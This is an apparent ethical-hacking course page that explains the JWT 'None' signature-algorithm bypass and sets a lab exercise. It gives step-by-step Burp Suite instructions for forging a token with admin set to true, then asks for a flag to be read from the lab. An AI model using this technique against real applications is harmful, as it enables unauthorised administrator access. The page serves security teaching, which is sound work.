JWT Attacks

Do Not Check This Token Thanks - JWT's Notorious 'None' Algorithm

Easy
30 min

"None" Algorithm

One of the "signature algorithms" for JWT is "None", meaning no signature at all. If an application accepts such tokens, even if the developer hasn't considered it, the consequences are catastrophic. A JWT token with "None" as the signature algorithm looks like this:

Step 1 - Obtain Token

Obtain the JWT token that the application gives you. You can see this in Burp's HTTP history when you invoke functions of the application that include the token.

2. Step - Send HTTP request to repeater

Send an HTTP request containing the token to the repeater so that you can send the request again and again, always modifying the token, and see when the application accepts the modified token, indicating a successful attack.

Step 3 - Edit token

Decode the token, change its JOSE header algorithm (alg) value to "None", and reassemble the token. You can do this in a couple of different ways, one option is Hakatemian JWT Studio (Tools -> JWT Studio):

The second option is to use BurpSuite's "JSON Web Tokens" extension:

4. Step - Victory

Once you have assembled a new JWT, replace the token originally present in the HTTP request with it and resend the request.

JWT Verification Bypass - 'None' Algorithm

In this lab, you will be able to perform your first JWT attack. The goal is to log in to the application as a regular user and obtain a token that has the "admin" claim value set to false. Then, using the techniques you have learned in this module, modify the token so that the "admin" claim value is true. Finally, read the flag from the /api/v1/flag endpoint.

Objective

Read the flag from the /api/v1/flag endpoint.

Exercises

Flag

Find the flag from the lab environment and enter it below.

hakatemia pro

Ready to become an ethical hacker?
Start today.

As a member of Hakatemia you get unlimited access to Hakatemia modules, exercises and tools, and you get access to the Hakatemia Discord channel where you can ask for help from both instructors and other Hakatemia members.